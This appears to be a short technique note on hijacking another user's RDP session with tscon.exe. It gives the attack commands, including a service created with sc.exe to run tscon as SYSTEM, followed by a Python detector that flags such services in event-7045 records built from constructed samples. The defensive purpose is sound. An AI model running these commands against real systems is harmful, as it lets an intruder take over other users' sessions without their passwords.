RDP Session Hijacking

To successfully impersonate a user without their password, we need SYSTEM privileges and the Microsoft tscon.exe binary, which lets a user connect to another desktop session. It works by specifying the session ID we want to take over and the name of the session (ours) it should be attached to. So, for example, the following command will open the specified SESSION_ID as a new console within our current RDP session:

Use:
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}
sc.exe create sessionhijack binpath= "cmd.exe /k tscon {ID} /dest:{Session-name}"
net start sessionhijack
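A defender-side check for the service-based variant above, added here as an example rather than taken from the original page: it scans service-installation records (System log event 7045, whose service file name carries the binPath given to sc.exe) for a command line that runs tscon with a /dest: target. The record field names and the sample events are constructed simplifications, not real log output.

```python
import re

# Matches a service binary path that wraps a tscon session switch, i.e. the
# binpath= value from: sc.exe create ... binpath= "cmd.exe /k tscon <id> /dest:<name>"
TSCON_RE = re.compile(r"\btscon(?:\.exe)?\s+(\d+)\s+/dest:(\S+)", re.IGNORECASE)


def check_service_install(event):
    """Return a finding dict if a service-install record (System event 7045)
    launches tscon against another session, else None.  Field names here are
    simplified assumptions; real 7045 records use 'Service Name' and
    'Service File Name'."""
    if event.get("EventID") != 7045:
        return None
    match = TSCON_RE.search(event.get("ImagePath", ""))
    if not match:
        return None
    return {
        "service": event.get("ServiceName"),
        "target_session_id": int(match.group(1)),
        "dest_session": match.group(2).strip('"'),
        "account": event.get("AccountName"),
    }


def find_session_hijack_services(events):
    """Run the check over a batch of records and keep only the findings."""
    return [f for f in (check_service_install(e) for e in events) if f]


# Constructed sample records (not real log output) for a stand-alone run.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "sessionhijack", "AccountName": "LocalSystem",
     "ImagePath": "cmd.exe /k tscon 2 /dest:rdp-tcp#5"},
    {"EventID": 7045, "ServiceName": "BackupAgent", "AccountName": "LocalSystem",
     "ImagePath": r'"C:\Program Files\Backup\agent.exe" --service'},
    {"EventID": 7045, "ServiceName": "svc7", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Windows\System32\cmd.exe /c TSCON.EXE 1 /DEST:console"},
    {"EventID": 7036, "ServiceName": "sessionhijack", "AccountName": "",
     "ImagePath": ""},  # service state change, not an install: ignored
]

if __name__ == "__main__":
    for finding in find_session_hijack_services(SAMPLE_EVENTS):
        print(finding)
```

Because tscon itself is a legitimate admin tool, the signal worth alerting on is the combination: a freshly installed service running as LocalSystem whose binary path is a shell launching tscon.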

